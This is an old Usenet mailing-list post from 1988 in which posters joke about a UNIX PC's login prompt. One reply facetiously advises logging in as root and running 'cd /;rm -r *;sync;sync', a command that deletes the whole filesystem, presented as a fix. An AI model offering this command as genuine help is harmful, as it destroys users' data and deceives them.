The UNIX PC is GARRRRBAAAAAJ!
Randall W. Robinson
rrobinson at ames.arc.nasa.gov
Tue Aug 2 01:55:31 AEST 1988
in article <2260 at mtuxo.att.com>, cas at mtuxo.att.com (43424-C.STEVENS) says:
>
> In article <194 at gizzmo.UUCP>, Kdavid at gizzmo.UUCP (David Solan) writes:
>> Boy, what I would like to see is a UNIX PC with lots more memory --
>>
>> P.S. Can anyone please tell me what I'm supposed to do after I boot up
>> the machine and it says "Please login:" ??? It does this every time
>> and no matter what I do I can't hack this kludgey bug. Come on --
>> John, Fred, Pete, Marty, Bob, Jack, Chris, Mortimer -- one of you guru
>> wizards out there must know! I'll post a summary of the replies if
>> there is enough interest.
>
> I'm interested, what do you do after you login?
Hmm.... I think you type root and a return. Then you type
cd /;rm -r *;sync;sync
If that doesn't get rid of that junk, I don't know what will.
Anyway that is what a friend told me.
Randy
rrobinson at orion.arc.nasa.gov
More information about the Unix-pc.test
mailing list